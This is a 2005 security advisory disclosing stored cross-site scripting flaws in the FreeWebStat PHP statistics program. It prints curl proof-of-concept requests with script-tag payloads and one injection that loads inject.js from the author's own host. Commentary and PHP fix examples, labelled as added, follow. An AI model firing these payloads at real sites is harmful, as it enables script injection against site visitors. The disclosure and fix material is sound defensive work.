FreeWebStat Multiple Cross Site Scripting
Posted Dec 1, 2005
Authored by Francesco Ongaro | Site ush.it

FreeWebStat version 1.0 rev37 is vulnerable to multiple cross site scripting flaws.

tags | advisory, xss
SHA-256 | 0020303ba5ebcc0da8d674752ec0c2c826555fce3288cdd245981ad3915983ad

FreeWebStat Multiple XSS Vulnerabilities

Name Multiple XSS Vulnerabilities in FreeWebStat
Systems Affected FreeWebStat (verified on 1.0 rev37)
Severity Medium Risk
Vendor www.freewebstat.com
Advisory http://www_ush_it/2005/11/25/free-web-stat/
Author Francesco "aScii" Ongaro (ascii at katamail . com)
Date 20051125

I. BACKGROUND

FreeWebStat is a PHP statistics program; more information is
available at the vendor site.

II. DESCRIPTION

FreeWebStat 1.0 rev37 (the latest version at the time of writing)
is vulnerable to multiple XSS flaws. The impact is a little bigger
than a reflected XSS, since the data is stored to file and the result
of a single query persists for some time on the backend. A well-timed
loop of requests will make the XSS permanent.

We issued an advisory for another application by the same
author, "Php Web Statistik Multiple Vulnerabilities", and the
author replied that "new version with all fixed bugs can be found
under www.freewebstat.com". Well, we downloaded this version
and found the same type of vulnerabilities.

The old advisory:
http://www_ush_it/2005/11/19/php-web-statistik/

III. ANALYSIS

These vulnerabilities can be exploited with a single GET request.

1) logdb.html XSS

logdb.html is vulnerable to JS injection using
anti-escape methods (e.g. single quotes are stripped,
but there are plenty of working workarounds for this).

1.1) Curl the pixel.php

curl "http://local.asciistation.zapto.org/fws/pixel.php\
?domain=<script>alert(1)</script>\
&site=<script>alert(2)</script>\
&jsref=<script>alert(3)</script>\
&jsres=<script>alert(4)</script>\
&jscolor=<script>alert(5)</script>" \
-A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))" \
-e "http://www_ush_it"

$site, $jsref, $jsres and $jscolor are vulnerable.

Loading a URL into $jsref will give you a full link (if the logdb.html
page has any PR (PageRank), you can drain some of it).

1.2) Call stats.php

This will generate the new logdb.html file.

1.3) Visit logdb.html

You will see some alerts. : )

The order with the example query is 2 3 2 3 4 5.

1.4) Some test curls

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
domain=ush.it&site=<script>alert(123)&jsref=1024x768
&jsres=1337&jscolor=red" -e "http://www.google.it/search?q=
lello+splendor++&hl=it&lr=&start=10&sa=N" -A "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=1337&jscolor=red"
-e "http://www.google.it/search?q=lello+splendor++&hl=it&lr=&start=
10&sa=N" -A "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=1337&jscolor=red"
-e "http://www.suma.it/" -A "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
domain=<script>alert(1)</script>&site=
<script>alert(2)&jsref=</script><script>alert(3)</script>
&jsres=<script>alert(4)</script>&jscolor=
<script>alert(5)</script>"
-A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"
-e "http://www_ush_it"

2) stat.php search key XSS

2.1) Detecting the search key XSS

- if ( !in_array ( $logfile_entries [ 2 ] , $ip_archive ) )
+ if (TRUE)

# save the referer except the own domain name.
if the browser value is empty, do not save
+ echo "DEBUG<h1>".$logfile_entries [ 7 ]."</h1>";
if ( ( strpos ( $logfile_entries [ 7 ] , $exception_domain )
=== FALSE ) && ( trim ( $logfile_entries [ 7 ] ) != "" ) )
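Review bot: the added `+ echo "DEBUG<h1>".$logfile_entries [ 7 ]."</h1>";` writes the logged referer (field 7, which the text below identifies as $jsref) into the page without any escaping, so this diagnostic line is itself a second reflection point for whatever was stored in that field; keep it on a local test copy only, or wrap the value in htmlspecialchars() if it has to stay. Replacing the `in_array ( $logfile_entries [ 2 ] , $ip_archive )` check with `if (TRUE)` also disables the per-IP deduplication, so every logged hit is processed; that is convenient for reproducing the issue but must not be carried into a fix.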

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&
site=aa&jsref=sukasuka&jsres=1337&jscolor=red"

This will display one "DEBUG sukasuka" line, between the header and
the "summary", for each new query.

# save the referer except the own domain name.
if the browser value is empty, do not save
if ( ( strpos ( $logfile_entries [ 7 ] , $exception_domain )
=== FALSE ) && ( trim ( $logfile_entries [ 7 ] ) != "" ) )

$logfile_entries[7] is the $jsref variable.

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
site=&jsres=&jscolor=&jsref=ssss&domain="

search words ( 1 ) lello splendor 100 % 1
search engines ( 1 ) Google 100 % 1

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
site=&jsres=&jscolor=&jsref=http://www.google.it/search?
q=lello+splendor++&hl=it"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
site=&jsres=&jscolor=&jsref=http://www.google.it/search?
q=<script>alert(123456789)</script>++&hl=it"

Now the injection is executed at two points: the referer table and the
keyword table.

2.2) Exploiting the search key XSS

stat.php plays some tricks on the string, and we are evil. The string is
lowercased, and any + or - character becomes a real space (not a %20).

$terms = str_replace( '\"', "", $terms ); # delete \"
$terms = strtolower( $terms ); # string to lower

$terms = str_replace( "+" , " ", $terms ); # replace + with space
$terms = str_replace( "-" , " ", $terms ); # replace - with space
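The normalisation above lowercases the search terms and turns + and - into spaces, but it never HTML-encodes them before they land in the keyword table, which is why a script tag survives the trip. As an added example (not FreeWebStat's code), the following PHP keeps that exact normalisation and adds the missing step: escaping at the point of output. The function names extract_search_terms, normalize_terms and render_term_cell are chosen here, and the two referers are constructed from the advisory's own test requests.

```php
<?php
// Added example, not FreeWebStat's code: the quoted normalisation plus
// output escaping, which the original stat.php lacks.

// Pull the q= parameter out of a referer URL with the URL parser rather
// than string searching; returns null when there is no query string.
function extract_search_terms(string $referer): ?string {
    $query = parse_url($referer, PHP_URL_QUERY);
    if (!is_string($query)) {
        return null;
    }
    parse_str($query, $params);
    return (isset($params['q']) && is_string($params['q'])) ? $params['q'] : null;
}

// The same normalisation the advisory quotes from stat.php.
function normalize_terms(string $terms): string {
    $terms = str_replace('\"', '', $terms);        // delete \"
    $terms = strtolower($terms);                   // string to lower
    $terms = str_replace(['+', '-'], ' ', $terms); // + and - become spaces
    return $terms;
}

// Escape for an HTML text node at render time, so it no longer matters
// what characters the stored value contains.
function render_term_cell(string $terms): string {
    return '<td>' . htmlspecialchars($terms, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</td>';
}

// Constructed sample referers, taken from the advisory's test requests.
$samples = [
    'http://www.google.it/search?q=lello+splendor++&hl=it',
    'http://www.google.it/search?q=<script>alert(123456789)</script>++&hl=it',
];

foreach ($samples as $ref) {
    $raw = extract_search_terms($ref);
    if ($raw === null) {
        continue;
    }
    $stored = normalize_terms($raw);
    echo "stored:   " . $stored . "\n";
    echo "rendered: " . render_term_cell($stored) . "\n";
}
```

The second sample is stored as `<script>alert(123456789)</script>` (lowercased, trailing spaces), exactly as the original would store it; the difference is that render_term_cell emits it as `&lt;script&gt;...`, so the keyword table displays the text instead of executing it.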

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?site=
&jsres=&jscolor=&jsref=http://www.google.it/search?
q=ppoopp<script language="javascript"-src=
"http://local.asciistation.zapto.org/fws/inject.js"></script>&hl=it"

IV. DETECTION

FreeWebStat 1.0 rev37 is vulnerable.
Older versions were not verified.

V. WORKAROUND

Input validation will fix the vulnerability.
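As an added example of that workaround (this is not FreeWebStat's code), the PHP below applies allow-list validation to the five pixel.php parameters the advisory names before anything is written to the log, and escapes them again when the statistics page is rendered. The function names validate_pixel_params and html are chosen here, and the patterns are this example's assumptions about what legitimate values look like (the advisory's own tests send values such as 1024x768, 1337 and red).

```php
<?php
// Added example, not FreeWebStat's code: validate pixel.php parameters on
// the way in, escape them on the way out.

function validate_pixel_params(array $get): array {
    $clean = [];
    // Assumed shapes of legitimate values; anything else is stored empty.
    $rules = [
        'domain'  => '/^[A-Za-z0-9.-]{1,253}$/',   // hostname characters only
        'site'    => '/^[A-Za-z0-9_.-]{1,64}$/',   // site identifier
        'jsres'   => '/^\d{2,5}x\d{2,5}$/',         // screen resolution, e.g. 1024x768
        'jscolor' => '/^[A-Za-z0-9]{1,16}$/',       // short alphanumeric token
    ];
    foreach ($rules as $name => $re) {
        $v = $get[$name] ?? '';
        $clean[$name] = (is_string($v) && preg_match($re, $v)) ? $v : '';
    }

    // The referer must parse as an http(s) URL with a plain hostname;
    // markup or bare text never gets stored.
    $ref   = $get['jsref'] ?? '';
    $parts = is_string($ref) ? parse_url($ref) : false;
    $ok = $parts !== false
        && isset($parts['scheme'], $parts['host'])
        && in_array(strtolower($parts['scheme']), ['http', 'https'], true)
        && preg_match('/^[A-Za-z0-9.-]+$/', $parts['host']);
    $clean['jsref'] = $ok ? $ref : '';

    return $clean;
}

// Escape for an HTML text node at render time.
function html(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs: one benign hit and one carrying the advisory's payloads.
$hits = [
    ['domain' => 'ush.it', 'site' => 'aa',
     'jsref' => 'http://www.google.it/search?q=lello+splendor',
     'jsres' => '1024x768', 'jscolor' => 'red'],
    ['domain' => '<script>alert(1)</script>', 'site' => '<script>alert(2)</script>',
     'jsref' => '<script>alert(3)</script>', 'jsres' => '<script>alert(4)</script>',
     'jscolor' => '<script>alert(5)</script>'],
];

foreach ($hits as $hit) {
    $clean = validate_pixel_params($hit);
    // Validation limits what reaches the log file; escaping on output
    // still protects the page if an older, unvalidated log line is read.
    echo '<tr>';
    foreach ($clean as $field => $value) {
        echo '<td>' . html($value) . '</td>';
    }
    echo "</tr>\n";
}
```

For the first hit every field passes and is rendered unchanged; for the second, all five fields fail validation and are stored empty, so the logdb.html row contains no payload at all. Doing both steps matters because the advisory's attack relies on stored data: validation stops new poisoned entries, while output escaping neutralises whatever was already written before the fix.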

VI. VENDOR RESPONSE

Vendor will fix and release a new version.

VII. CVE INFORMATION

No CVE at this time.

VIII. DISCLOSURE TIMELINE

20051125 Bug discovered
20051125 Developer notification
20051125 Advisory released
20051128 Vendor response

IX. CREDIT

ascii is credited with the discovery of this vulnerability.

X. LEGAL NOTICES

Copyright (c) 2005 Francesco "aScii" Ongaro

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without my express
written consent. If you wish to reprint the whole or any
part of this alert in any medium other than electronically, please
email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.